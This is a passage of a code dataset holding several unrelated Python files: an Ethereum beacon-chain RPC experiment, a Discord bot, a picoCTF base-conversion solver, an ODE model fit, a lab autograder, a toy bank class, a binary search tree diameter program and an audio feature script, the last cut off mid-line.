pass\n\n\ndef load_state(filepath: str) -> BeaconState:\n    state_size = os.stat(filepath).st_size\n    with io.open(filepath, 'br') as f:\n        return BeaconState.deserialize(f, state_size)\n\n\nasync def basic_status_example(rumor: Rumor, nursery: trio.Nursery):\n\n    # Load some genesis state of the client (or use make_genesis.py)\n    state = load_state('genesis.ssz')\n\n    # Morty is us\n    morty = rumor.actor('morty')\n    await morty.host.start()\n    await morty.host.listen(tcp=9000)\n    print(\"started morty\")\n\n    # Rick is the other client\n    rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n    rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n    print(f\"connected to Rick {rick_peer_id}\")\n\n    print(\"Testing a Status RPC request\")\n\n    genesis_root = state.hash_tree_root()\n\n    # Sync status\n    morty_status = Status(\n        version=GENESIS_FORK_VERSION,\n        finalized_root=genesis_root,\n        finalized_epoch=0,\n        head_root=genesis_root,\n        head_slot=0,\n    )\n\n    req = morty_status.encode_bytes().hex()\n    print(f\"morty: sending rick a status request: {req}\")\n\n    # Note: public testnet node is not updated, only receiving an empty response if snappy is enabled.\n    resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True)\n\n    print(f\"morty: received status response from rick: {resp}\")\n    try:\n        rick_status = Status.decode_bytes(bytes.fromhex(resp['chunk']['data']))\n        print(rick_status)\n    except Exception as e:\n        print(f\"could not decode status response: {e}\")\n\n    call = morty.rpc.status.listen(raw=True, compression='snappy')\n    # Other keywords to try here:\n    # Req-resp timeout: timeout=123000 (in milliseconds, 0 to disable)\n    # Drop contents, not keeping track of them to reply later: drop=True\n    # Ignore request bytes, do not read any: read=False\n\n    async def process_requests():\n        async for req in call.req():\n            print(f\"morty: Got request: {req}\")\n\n            # Respond with Input error\n            # await morty.rpc.status.resp.invalid_request(req['req_id'], f\"hello! Morty does not like your request!\")\n\n            # Respond with server error\n            # await morty.rpc.status.resp.server_error(req['req_id'], f\"hello! 
Morty failed, look for a new morty!\")\n\n # Respond with valid chunk (and done=True to exit immediately after)\n resp = morty_status.encode_bytes().hex()\n await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, done=True)\n\n # Or send arbitrary data\n # resp = bytes.fromhex('1337')\n # await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, result_code=2, done=True)\n\n print(\"morty: stopped listening for requests\")\n\n print(\"listening for requests\")\n await process_requests()\n\n # Or start listening in the background:\n # nursery.start_soon(process_requests)\n # await call.started() # wait for the stream handler to come online, there will be a \"started=true\" entry.\n\n\nasync def server_blocks_by_range_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRange.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n start = parsed_req.start_slot\n end = start + parsed_req.count * parsed_req.step\n\n for i, slot in zip(range(parsed_req.count), range(start, end, parsed_req.step)):\n # Try any message:\n # resp = f\"not a block, but can you decode this chunk though? 
chunk nr {i} here\".encode()\n            # Or construct a block (can make it more consensus-valid, but snappy compression testing can be simple):\n            resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n            print(f\"responding chunk {i} slot {slot} chunk: {resp}\")\n            await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == parsed_req.count))\n\n        print(\"done responding\")\n\n    print(\"morty: stopped listening for requests\")\n\n\nasync def server_blocks_by_root_example(rumor: Rumor, nursery: trio.Nursery):\n\n    # Morty is us\n    morty = rumor.actor('morty')\n    await morty.host.start()\n    await morty.host.listen(tcp=9000)\n    print(\"started morty\")\n\n    # Rick is the other client\n    rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n    rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n    print(f\"connected to Rick {rick_peer_id}\")\n\n    call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n\n    print(\"listening for requests\")\n\n    async for req in call.req():\n        print(f\"morty: Got request: {req}\")\n\n        parsed_req = BlocksByRoot.decode_bytes(bytes.fromhex(req['chunk']['data']))\n        print('parsed request: ', parsed_req)\n\n        for i, root in enumerate(parsed_req):\n            # a real server would look up the block for each requested root; the slot is unknown here, so respond with a default block\n            resp = SignedBeaconBlock(message=BeaconBlock()).encode_bytes().hex()\n            print(f\"responding chunk {i} root {root}, chunk: {resp}\")\n            await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == len(parsed_req)))\n\n        print(\"done responding\")\n\n    print(\"morty: stopped listening for requests\")\n\nasync def send_all_requests(rumor: Rumor, nursery: trio.Nursery):\n    # Enr of node we are connecting to\n    rick_enr = \"enr:-Ku4QM-p4szB_L1Ca32OpGh0tL2kZA2I26hXNtcbMcolFZz6Kfumn33-n8cE3qyGCsFRQPCa0DszEy9tBJnp0sb9YkEBh2F0dG5ldHOIAAAAAAAAAACEZXRoMpAAAAAAAAAAAAAAAAAAAAAAgmlkgnY0gmlwhH8AAAGJc2VjcDI1NmsxoQMHzWU3mH2sphZXxi24HHpBo7VHM2YnjjA8ofU9f7XhYYN0Y3CCIyk\"\n    # Hardcoding the secp256k1 secret key so that morty enr does not change\n    sk = \"080212200dff66316603dd7b75fe828a91747ed4dcc03976601ab3790abb7c919c6e8808\"\n    # Morty is us\n    morty = rumor.actor(\"morty\")\n    await morty.host.start()\n    await morty.host.listen(tcp=9000)\n    print(\"started morty\")\n\n    # Listening before connection to advertise our supported protocols\n    call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n    call = morty.rpc.status.listen(raw=True, compression='snappy')\n    call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n    call = morty.rpc.goodbye.listen(raw=True, compression='snappy')\n    rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n    print(f\"connected to Rick {rick_peer_id}\")\n\n    state = load_state(\"genesis.ssz\")\n    genesis_root = state.hash_tree_root()\n\n    # Status\n    morty_status_request = Status(\n        version=GENESIS_FORK_VERSION,\n        finalized_root=genesis_root,\n        finalized_epoch=0,\n        head_root=genesis_root,\n        head_slot=0,\n    )\n    req = morty_status_request.encode_bytes().hex()\n    print(f\"morty: sending rick a status request: {req}\")\n\n    resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True, compression='snappy')\n\n    print(f\"morty: received status response from rick: {resp}\")\n    try:\n        r = Status.decode_bytes(bytes.fromhex(resp[\"chunk\"][\"data\"]))\n        print(r)\n    except Exception as e:\n        print(f\"could not decode status response: {e}\")\n\n    # 
Range\n    morty_range_request = BlocksByRange(\n        head_block_root=\"0x0000000000000000000000000000000000000000000000000000000000000000\",\n        start_slot=0,\n        count=5,\n        step=1,  # a step of 0 would make range() fail on the serving side; use at least 1\n    )\n    req = morty_range_request.encode_bytes().hex()\n    print(f\"morty: sending rick a range request: {req}\")\n\n    resps = morty.rpc.blocks_by_range.req.raw(rick_peer_id, req, raw=True, compression = 'snappy')\n\n    async def process_response():\n        async for resp in resps.chunk():\n            print(f\"morty: received range response from rick: {resp}\")\n            try:\n                r = SignedBeaconBlock.decode_bytes(\n                    bytes.fromhex(resp[\"data\"])\n                )\n                print(r)\n            except Exception as e:\n                print(f\"could not decode range response: {e}\")\n    await process_response()\n\n    # Root\n    morty_root_request = BlocksByRoot([genesis_root])\n\n    req = morty_root_request.encode_bytes().hex()\n    print(f\"morty: sending rick a root request: {req}\")\n\n    resp = await morty.rpc.blocks_by_root.req.raw(rick_peer_id, req, raw=True)\n\n    print(f\"morty: received root response from rick: {resp}\")\n    try:\n        r = SignedBeaconBlock.decode_bytes(\n            bytes.fromhex(resp[\"chunk\"][\"data\"])\n        )\n        print(r)\n    except Exception as e:\n        print(f\"could not decode root response: {e}\")\n\n    # Goodbye\n    morty_goodbye_request = Goodbye(0)\n\n    req = morty_goodbye_request.encode_bytes().hex()\n    print(f\"morty: sending rick a goodbye request: {req}\")\n\n    await morty.rpc.goodbye.req.raw(rick_peer_id, req, raw=True)\n    print(\"Done\")\n\n\n\nasync def run_rumor_function(fn: Callable[[Rumor, trio.Nursery], Coroutine]):\n    async with trio.open_nursery() as nursery:\n        try:\n            # Hook it up to your own local version of Rumor, if you like.\n            # And optionally enable debug=True to be super verbose about Rumor communication.\n            async with Rumor(cmd='cd ../rumor && go run .') as rumor:\n                await fn(rumor, nursery)\n        except Exception as e:\n            print(e)\n\n\n# trio.run(run_rumor_function, basic_status_example)\n# trio.run(run_rumor_function, server_blocks_by_range_example)\n# trio.run(run_rumor_function, server_blocks_by_root_example)\ntrio.run(run_rumor_function, send_all_requests)\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"347448466","text":"import sys\nsys.path.insert(0,\"../..\")\n\nif sys.version_info[0] >= 3:\n    raw_input = input\n\nimport patito_lex\nimport patito_parse\n\n# If a filename has been specified, we try to run it.\n# If a runtime error occurs, we bail out and enter\n# the other mode below\nif len(sys.argv) == 2:\n    data = open(sys.argv[1]).read()\n    prog = patito_parse.parse(data)\n\nelse:\n    patito_parse.parse(\"PROGRAM test ; VAR x : int ; { x = 5; IF ( x > 4.0) { x = x + 1; } ELSE { x = x - 1;};}\")","sub_path":"PLY_test/patito.py","file_name":"patito.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"35784783","text":"# imports\nimport discord\nfrom discord.ext import commands\nfrom safety import token\nfrom constants2 import *\nimport random\nimport asyncio\nimport math\n\n# school\ndesc = INFO\n\nbot = commands.Bot(command_prefix=('?'), description=desc, pm_help=True)\n\nclass Random:\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(pass_context=True)\n    async def joined(self,ctx, member : discord.Member):\n        \"\"\"Says when member joined.\n        Bot says time and date a member joined.\"\"\"\n        await self.bot.say('{0.name} joined on 
{0.joined_at}'.format(member))\n        await self.bot.add_reaction(ctx.message, \"\\U00002705\")\n\n    @commands.command(pass_context=True)\n    async def inv(self, ctx):\n        \"\"\"Bot makes invite.\n        Creates a 12-hour, 1 use invite.\"\"\"\n        new_inv = await self.bot.create_invite(destination=ctx.message.channel, max_age=43200, max_uses=1)\n        print(new_inv.url)\n        await self.bot.say(new_inv.url)\n\n    @commands.command(pass_context=True)\n    async def user_info(self, ctx, *, id: str):\n        \"\"\"User ID --> User Info.\n        Sends user info using ID of that user.\"\"\"\n        info = await self.bot.get_user_info(user_id=id)\n        print(info)\n        await self.bot.say(info)\n        await self.bot.add_reaction(ctx.message, \"\\U00002705\")\n\n    @commands.command(pass_context=True)\n    async def typing(self, ctx):\n        \"\"\"Try it and find out.\n        Easter egg.\"\"\"\n        await self.bot.send_typing(ctx.message.channel)\n\nclass Chance:\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(pass_context=True)\n    async def coin(self, ctx):\n        \"\"\"Flip a coin, any coin!\n        What more help does one need?\"\"\"\n        choice = random.randint(1,2)\n        if choice == 1:\n            await self.bot.say(\"**Heads!**\")\n        if choice == 2:\n            await self.bot.say(\"**Tails!**\")\n\n    @commands.command(name=\"8ball\",pass_context=True)\n    async def _ball(self, ctx):\n        \"\"\"Ask a question.\n        Any question.\"\"\"\n        await self.bot.say(random.choice([\"**Very likely!:rofl:**\", \"**Yes!**:smile:\", \"**No!:no_good:**\",\n                                          \"**Maybe!:shrug:**\", \"**Not Likely!:thumbsdown:**\",\n                                          \"**:shrug:Do a coin toss!\\n(Heads = No)\\n (Tails = Yes)**\",\n                                          \"**Absolutely**:thumbsup:\", \"**Ask Again:thinking:**\"]))\nclass Calculator:\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command()\n    async def add(self, left : float, right : float):\n        \"\"\"Adds.\n        Adds two numbers together.\"\"\"\n        await self.bot.say(left + right)\n\n    @commands.command()\n    async def subtract(self, left : float, right : float):\n        \"\"\"Subtracts.\n        Subtracts one number from another.\"\"\"\n        await self.bot.say(left - right)\n\n    @commands.command()\n    async def multiply(self, left : float, right : float):\n        \"\"\"Multiplies.\n        Multiplies two numbers together.\"\"\"\n        await self.bot.say(left * right)\n\n    @commands.command()\n    async def divide(self, left : float, right : float):\n        \"\"\"Divides.\n        Divides one number from another.\"\"\"\n        await self.bot.say(left / right)\n\n    @commands.command()\n    async def exponent(self, left : float, right : float):\n        \"\"\"Powers.\n        Raises left # by power of the right# \"\"\"\n        await self.bot.say(left ** right)\n\n    @commands.command()\n    async def root(self, left : float, right : float):\n        \"\"\"Roots.\n        Roots the left # by the right #\"\"\"\n        await self.bot.say(left ** (1/right))\n\n    @commands.command()\n    async def log(self, left : float, right: float = None):\n        \"\"\"Default base is 10. You can change by entering a second number.\"\"\"\n        if right is not None:\n            z = math.log(left, right)\n            s = str(z)\n            await self.bot.say(s)\n        if right is None:\n            z = math.log(left, 10)\n            s = str(z)\n            await self.bot.say(s)\n\nclass CommandErrorHandler:\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @bot.event\n    async def on_command_error(error, ctx):  # discord.py 0.16 invokes this event as (exception, context)\n        error = getattr(error, 'original', error)\n        if isinstance(error, commands.BadArgument):\n            reactions = [\"\\U0001f1ee\",\"\\U0001f1e9\",\"\\U00002139\",\"\\U0001f1f4\",\"\\U0001f1f9\",\"\\U00002757\"]\n            for x in reactions:\n                await bot.add_reaction(ctx.message, x)\n            await bot.send_message(ctx.message.channel, \"How do you mess up this bad? Check your command and try again!\")\n        if isinstance(error, commands.CheckFailure):\n            await bot.send_message(ctx.message.channel, \"You do not have the required permissions to use this command!\")\n        if isinstance(error, commands.MissingRequiredArgument):\n            await bot.send_message(ctx.message.channel, \"You are missing a required argument!\")\n        if isinstance(error, discord.Forbidden):\n            await bot.send_message(ctx.message.channel, \"I do not have permissions to complete this action!\")\n        if isinstance(error, discord.HTTPException):\n            await bot.send_message(ctx.message.channel, \"Command failed!\")\n        if isinstance(error, commands.CommandOnCooldown):\n            await bot.send_message(ctx.message.channel, \"Command on cool down due to spam! \"\n                                                        \"Please wait and try again!\")\n        if isinstance(error, commands.DisabledCommand):\n            await bot.send_message(ctx.message.channel, \"Command is currently disabled!\")\n        if isinstance(error, commands.NoPrivateMessage):\n            await bot.send_message(ctx.message.author, \"This command is not valid in Private Message!\")\n\n#built-in help command\n@bot.event\nasync def on_message(message):\n    await bot.process_commands(message)\n    if message.content ==\"?help\":\n        msg = await bot.send_message(message.channel, \"I just slid into your DMs. \"\n                                                      \"Click the check mark reaction after reading the help command!\")\n        await bot.add_reaction(msg, '\\U00002705')\n        res = await bot.wait_for_reaction(['✅'], user=message.author, message=msg)\n        await bot.delete_message(message)\n        await bot.delete_message(msg)\n\nasync def my_background_task():\n    await bot.wait_until_ready()\n    counter = 0\n    while not bot.is_closed:\n        counter +=1\n        x = len(bot.servers)\n        y= str(x)\n        await bot.change_presence(game=discord.Game(name=\"PREFIX = ?\"))\n        await asyncio.sleep(15) # rotate the presence every 15 seconds\n        await bot.change_presence(game=discord.Game(name=\"Have feedback or ?\"))\n        await asyncio.sleep(15)\n        await bot.change_presence(game=discord.Game(name= \"Bot Dev: Jashan#7754\"))\n        await asyncio.sleep(15)\n        await bot.change_presence(game=discord.Game(name=y +\" servers\"))\n        await asyncio.sleep(15)\n\n@bot.event\nasync def on_ready():\n    print('Logged in as:\\n{0} (ID: {0.id})'.format(bot.user))\n\nbot.loop.create_task(my_background_task())\nbot.add_cog(Chance(bot))\nbot.add_cog(Calculator(bot))\nbot.run(token)\n","sub_path":"bot2.py","file_name":"bot2.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"407863395","text":"import socket\nimport struct\n\nHOST = \"2018shell3.picoctf.com\"\nPORT = 15853\n\n#flag: picoCTF{delusions_about_finding_values_3cc386de}\n\ndef main():\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.connect((HOST, PORT))\n\n    for x in range(100):\n        text = sock.recv(1024)\n        print(text)\n        if b'Please give me the' in text and b' as a word.' 
in text:\n begin = text.index(b'me the ') + len('me the ')\n end = text.index(b' as a word.')\n print(text[begin:end])\n if b' ' in text[begin:end]:\n m = text[begin:end].strip()\n l = m.split(b' ')\n word = []\n for x in l:\n try:\n word.append(chr(int(x.decode('utf-8'), base=2)))\n except:\n word.append(chr(int(x.decode('utf-8'), base=8)))\n word = ''.join(word).encode()\n print(word)\n sock.sendall(word + b'\\n')\n else:\n word = bytearray.fromhex(text[begin:end].decode('utf-8')).decode()\n print(word)\n sock.sendall(word.encode() + b'\\n')\n\n\n sock.close()\n\nmain()","sub_path":"whatbaseisthis.py","file_name":"whatbaseisthis.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"576649853","text":"\"\"\"Standard (constant low FPS video)\"\"\"\n\nfrom cddm.sim import simple_brownian_video, adc\nfrom cddm.viewer import VideoViewer \nfrom cddm.video import load, crop, multiply\nfrom examples.paper.flow_video.conf import NFRAMES_STANDARD, SIMSHAPE, BACKGROUND, DELTA, DT_STANDARD, \\\n INTENSITY, SIGMA, SHAPE,DUST1_PATH, BIT_DEPTH, VMAX, NOISE_MODEL, SATURATION, READOUT_NOISE, APPLY_DUST, VELOCITY\nimport matplotlib.pyplot as plt\n\n#: this cretaes a brownian motion frame iterator. \n#: each element of the iterator is a tuple holding a single numpy array (frame)\nvideo = simple_brownian_video(range(NFRAMES_STANDARD), shape = SIMSHAPE,background = BACKGROUND, dt = DT_STANDARD,\n sigma = SIGMA, delta = DELTA, intensity = INTENSITY, dtype = \"uint16\", velocity = VELOCITY)\n\n#: crop video to selected region of interest \nvideo = crop(video, roi = ((0,SHAPE[0]), (0,SHAPE[1])))\n\n#: apply dust particles\nif APPLY_DUST:\n dust = plt.imread(DUST1_PATH)[0:SHAPE[0],0:SHAPE[1],0] #float normalized to (0,1)\n dust = ((dust,),)*NFRAMES_STANDARD\n video = multiply(video, dust)\n\nvideo = (tuple((adc(f, noise_model = NOISE_MODEL, saturation = SATURATION, readout_noise = READOUT_NOISE, bit_depth = BIT_DEPTH) for f in frames)) for frames in video)\n\nif __name__ == \"__main__\":\n #: no need to load video, but this way we load video into memory, and we \n #: can scroll back and forth with the viewer. 
Uncomment the line below.\n #video = load(video, NFRAMES) # loads and displays progress bar\n\n #: VideoViewer either expects a multi_frame iterator, or a numpy array\n viewer = VideoViewer(video, count = NFRAMES_STANDARD, vmin = 0, cmap = \"gray\", vmax = VMAX)\n viewer.show()","sub_path":"examples/paper/flow_video/standard_video.py","file_name":"standard_video.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525303407","text":"from scipy.integrate import odeint\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport seaborn as sns\n\nfrom config import data_file\n\n# read data from .csv file:\ndata_df = pd.read_csv(data_file, sep='\\t')\n\n# hypothetical experimental data:\nt_data = data_df['t'].tolist()\nX_data = data_df['X'].tolist()\nS_data = data_df['S'].tolist()\nP_data = data_df['P'].tolist()\n\n# growth and production model:\ndef model(vals, t, *args):\n # isolate current concentrations:\n X = vals[0]\n S = vals[1]\n PX = vals[2]\n Pmu = vals[3]\n P = vals[4]\n\n # isolate parameters from arguments:\n mumax = args[0]\n KS = args[1]\n YXS = args[2]\n pX = args[3]\n pmu = args[4]\n\n # gather current differentials:\n dXdt = X * mumax * S/(KS + S) # biomass growth\n dSdt = -dXdt * 1/YXS # substrate consumption\n dPXdt = X*pX\n dPmudt = pmu*dXdt\n dPdt = dPXdt + dPmudt # product formation (primary and secondary term)\n\n return [dXdt, dSdt, dPXdt, dPmudt, dPdt]\n\n# calculation of model error:\ndef least_square_calculator(params):\n # convert parameters to tuple:\n params = tuple(params)\n\n # gather model result and isolate simulated values:\n course = odeint(model, [X_data[0], S_data[0], P_data[0]/2, P_data[0]/2, P_data[0]], t_data, args=params)\n X_sim = course[:, 0]\n S_sim = course[:, 1]\n PX_sim = course[:, 2]\n Pmu_sim = course[:, 3]\n P_sim = course[:, 4]\n\n # calculate error square sum:\n deltas = [(np.square(xsim - xdat) + np.square(ssim - sdat) + np.square(psim - pdat)) for xsim, xdat, ssim, sdat,\n psim, pdat in zip(X_sim, X_data, S_sim, S_data, P_sim, P_data)]\n delta_sum = np.sqrt(np.sum(deltas))\n\n return delta_sum\n\n# plot creation:\ndef plot_results(data_df, sim_df):\n sns.set()\n plt.plot(sim_df['t'], sim_df['X'], 'k:')\n plt.plot(sim_df['t'], sim_df['S'], 'r--')\n plt.plot(sim_df['t'], sim_df['P'], 'b-')\n plt.plot(data_df['t'], data_df['X'], 'ko')\n plt.plot(data_df['t'], data_df['S'], 'ro')\n plt.plot(data_df['t'], data_df['P'], 'bo')\n\n plt.fill_between(sim_df['t'], sim_df['P'], sim_df['P(mu)'], facecolor='skyblue')\n plt.fill_between(sim_df['t'], sim_df['P(mu)'], 0, facecolor='steelblue')\n\n plt.suptitle('Result of Parameter Estimation:')\n plt.title('[proportions of P(X) and P(µ) plotted in light and dark blue, respectively]')\n plt.xlabel('Time [h]')\n plt.ylabel('X / S [g/L] and P [mg/L]')\n plt.legend(['X (sim.)', 'S (sim.)', 'P (sim.)', 'X (data)', 'S (data)', 'P (data)'])\n plt.show()\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"70061528","text":"def docs_feedback_lossless_compression(link):\n from CRLS_APCSP_autograder.app.docs_labs.docs import get_text, exact_answer, keyword_and_length\n\n tests = list()\n text = get_text(link)\n test1a = exact_answer('1a. song name', [r'\\s1a\\. .+? tabledata \\s [a-zA-Z\\.0-9] .+? 
2a\\.'], text, points=5)\n    test2a = keyword_and_length('2a. Copy+paste compressed song', [r'[a-zA-Z]'], text,\n                                search_string=r'2a\\. .*? tabledata (.+?) 3a\\.', min_length=1, points=1)\n    test3a = keyword_and_length('3a. Copy+paste dictionary', [r'[a-zA-Z]'], text,\n                                search_string=r'3a\\. .*? tabledata (.+?) 4a\\.', min_length=1, points=1)\n    test4a = keyword_and_length('4a. Copy+paste stats', [r'[a-zA-Z]'], text,\n                                search_string=r'4a\\. .*? tabledata (.+?) 5a\\.', min_length=20, points=1)\n    test5a = keyword_and_length('5a. What made compression hard', [r'[a-zA-Z]'], text,\n                                search_string=r'5a\\. .*? tabledata (.+?) 6a\\.', min_length=10, points=1)\n    test6a = keyword_and_length('6a. Describe thinking process', [r'[a-zA-Z]'], text,\n                                search_string=r'6a\\. .*? tabledata (.+?) 7a\\.', min_length=10, points=1)\n    test7a = keyword_and_length('7a. Possible to write instructions always better than heuristic?', [r'[a-zA-Z]'], text,\n                                search_string=r'7a\\. .*? tabledata (.+?) 8a\\.', min_length=10, points=1)\n    test8a = keyword_and_length('8a. Possible to know most compressed?', [r'[a-zA-Z]'], text,\n                                search_string=r'8a\\. .*? tabledata (.+?) 9a\\.', min_length=8, points=1)\n    test9a = keyword_and_length('9a. Can your friend read compressed? Dictionary?', [r'[a-zA-Z]'], text,\n                                search_string=r'9a\\. .*? tabledata (.+?) check \\s your \\s work', min_length=10, points=1)\n\n    tests.extend([test1a, test2a, test3a, test4a, test5a, test6a, test7a, test8a, test9a])\n    return tests\n","sub_path":"CRLS_APCSP_autograder/app/lossless_compression.py","file_name":"lossless_compression.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261488688","text":"def RoseWind_Speed(df_city):\n    # degs = [45, 90, ..., 360]\n\tdegs = np.arange(45,361,45)\n\ttmp = []\n\tfor deg in degs:\n\t    # get the mean wind speed for wind_deg values in the given range\n\t\ttmp.append(df_city[(df_city['wind_deg']>(deg-46)) & (df_city['wind_deg']curr.data:\r\n            if curr.right is None:\r\n                curr.right=n\r\n                break\r\n            else:\r\n                curr=curr.right\r\n        else:\r\n            break\r\n\r\ndef inorder(root):\r\n    if root is None:\r\n        return None\r\n    inorder(root.left)\r\n    print(root.data,end=' ')\r\n    inorder(root.right)\r\n\r\ndef height(root):\r\n    if root is None:\r\n        return 0\r\n    return 1+max(height(root.left),height(root.right))\r\ndef diameter(root):\r\n    if root is None:\r\n        return 0\r\n    lheight=height(root.left)\r\n    rheight=height(root.right)\r\n\r\n    ldiameter=diameter(root.left)\r\n    rdiameter=diameter(root.right)\r\n\r\n    return max(lheight+rheight+1,max(ldiameter,rdiameter))\r\n#################\r\ndef height2(root,ar):\r\n    if root is None:\r\n        return 0\r\n    lheight=height2(root.left,ar)\r\n    rheight=height2(root.right,ar)\r\n\r\n    ar[0]=max(ar[0],lheight+rheight+1)\r\n    return 1+max(lheight,rheight)\r\n\r\n\r\ndef diameter2(root):\r\n    if root is None:\r\n        return 0\r\n    ar=[-sys.maxsize]\r\n    height2(root,ar)\r\n    return ar[0]\r\n##############\r\nob=BinarySearchTree()\r\nl=list(map(int,input().split()))\r\nfor i in l:\r\n    ob.insert(i)\r\nprint('Inorder : ',end=' ')\r\ninorder(ob.root)\r\nprint()\r\n\r\nd=diameter(ob.root)\r\nprint('Diameter : ',d)\r\n","sub_path":"Trees/diameter_of_BST.py","file_name":"diameter_of_BST.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"128194572","text":"class Account():\n    id = 0\n    def __init__(self, owner, balance, rate):\n        Account.id +=1\n        accountnum = Account.id\n        
self.owner = owner.name\n self.account_number = accountnum\n self.balance = balance.value\n self.currency = balance.currency\n self.rate = rate/100\n\n def deposit(self, amount):\n self.balance = self.balance + amount.value\n\n def withdraw(self, amount):\n #add valid denoms logic here\n sum = Money('RM', amount)\n if sum.value:\n self.balance = self.balance - sum.value\n return sum.value\n\n def set_rate(self, new_rate):\n self.rate = new_rate/100\n\n def show_balance(self):\n print(f\"{self.currency} {self.balance}\")\n\n def accrue_interest(self, years):\n self.balance = self.balance*(1+self.rate)**years\n\nclass Money():\n valid_denoms = (100, 50, 20, 10, 5, 1)\n def __init__(self, currency, value):\n self.currency = currency\n copy = value\n for denom in self.valid_denoms:\n if copy >= denom:\n copy = copy - (copy//denom)*denom\n if copy == 0:\n self.value = value\n else:\n print(\"Not a valid denomination. Please try again.\")\n self.value = 0\n\n def __str__(self):\n return f\"{self.currency} {self.value}\"\n\nclass Holder():\n def __init__(self, name):\n self.name = name\n\namar = Holder('Amar')\n\nsum = Money('RM',9001)\n\namar_account = Account(amar, sum, 6)\n\nbreakpoint()","sub_path":"week_1/day-4/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"651183632","text":"#!/usr/bin/python\n# Put the scripts into a subfolder of the AVEC2018_CES package, e.g., AVEC2018_CES/scripts_CES/\n# Output: csv files with functionals of low-level descriptors (LLDs)\n\nimport os\nimport fnmatch\nimport numpy as np\nimport librosa\nimport pandas as pd\n\n# Folders with feature files\nfolder_lld_features = './egemaps_improv/'\nimprov_path = '/media/bagus/data01/dataset/MSP-IMPROV/'\n\n# Get all files\nfiles = fnmatch.filter(os.listdir(folder_lld_features), '*.csv') # filenames are the same for all modalities\nfiles.sort()\nfeat = []\n\n# Generate files with functionals\nfor fn in files:\n print(\"Processing ...\", fn)\n # extract 23 features from GeMAPS\n data = pd.read_csv(folder_lld_features+fn, sep=';', usecols=range(2, 25))\n \n # extract silence\n filename = ('session' + fn[18] + '/' + fn[11:15] + '/'\n + fn[20] + '/' + fn[:-4] + '.wav')\n y, sr = librosa.load(filename, sr=16000) \n # extract rms using different duration: 200 ms (3200), 500 ms (8000), \n # and 1 s (16000 samples), 128 ms (2048) \n rmse = librosa.feature.rms(y + 0.0001, frame_length=2048)[0]\n\n silence = 0\n for e in rmse:\n if e <= 